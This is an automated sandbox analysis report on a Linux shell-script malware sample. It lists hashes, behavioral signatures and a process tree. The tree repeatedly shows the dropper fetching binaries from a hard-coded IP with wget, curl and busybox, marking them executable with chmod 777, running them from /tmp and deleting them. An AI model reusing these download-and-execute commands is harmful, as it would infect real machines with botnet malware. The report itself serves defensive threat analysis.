Analysis
-
max time kernel
61s -
max time network
63s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:04
Static task
static1
Behavioral task
behavioral1
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh
-
Size
10KB
-
MD5
8831ac149f5712a653b2ed7d4a827e57
-
SHA1
e48119cbe7dcbf516620e6b82c96350ecb491554
-
SHA256
0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd
-
SHA512
368cdcd017b026288093ca2a837a48c67cee319efbe80778a1a7c80f7206446b4944f3ade0ba0e8bfa35bc140fc293621629cd99e3e8e54e7226c2598122500f
-
SSDEEP
96:HMMfw0o7MQoiYo7XjoP3uZJs/CqDyu7hlQdddimXhGXhaXh+WXhyXhCXhnEQyhlT:MAmyjhlQdddiGmSHqaGhlQddtmSHqalu
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 915 chmod 969 chmod 909 chmod 933 chmod 957 chmod 975 chmod 828 chmod 939 chmod 945 chmod 981 chmod 822 chmod 739 chmod 753 chmod 809 chmod 885 chmod 897 chmod 869 chmod 921 chmod 951 chmod 784 chmod 879 chmod 891 chmod 903 chmod 927 chmod 963 chmod 747 chmod 762 chmod 848 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 740 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 748 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 754 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 764 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 786 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 811 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 823 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 829 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 850 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 870 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 880 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 886 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 892 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 898 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead 904 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA 910 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 916 OESnKxfsceE83uK3qyhjMDf2qeykBknq50 /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr 922 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf 928 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF 934 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v 940 ekoIDag2IrendezgvRAX8H4MvHggSiH31v /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 946 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ 952 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 958 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M 964 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub 970 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 976 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT 982 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr curl File opened for modification /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1 curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6 curl File opened for modification /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT curl File opened for modification /tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v curl File opened for modification /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5 curl File opened for modification /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50 curl File opened for modification /tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M curl File opened for modification /tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf curl File opened for modification /tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead curl
Processes
-
/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh/tmp/0a1308880420110e9878381af3dfb552e8e6acc4a111e97a100e56b011cf1bbd.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:714
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:725
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:735
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:746
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:752
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:758
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:780
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:784
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:786
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:788
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:790
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:804
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:814
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:815
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:821
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:826
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:827
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:828
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:829
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:831
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:832
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:833
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:848
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:852
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:854
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:865
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:878
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:884
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:890
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:896
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:902
-
-
/bin/chmodchmod 777 IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead./IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:908
-
-
/bin/chmodchmod 777 E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA./E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm E6E5q9KAaVamGO2OjqIdGsBCrZzH74QYEA2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:914
-
-
/bin/chmodchmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50./OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm OESnKxfsceE83uK3qyhjMDf2qeykBknq502⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:920
-
-
/bin/chmodchmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:926
-
-
/bin/chmodchmod 777 F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf./F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm F41lCpIcaN1MZ23Jca6FQy69MNj58hwvLf2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:932
-
-
/bin/chmodchmod 777 ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF./ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm ns0YQY8mHXo2vdg5BKxjt7El3EglwBj1OF2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:938
-
-
/bin/chmodchmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v./ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm ekoIDag2IrendezgvRAX8H4MvHggSiH31v2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:944
-
-
/bin/chmodchmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- File and Directory Permissions Modification
PID:945
-
-
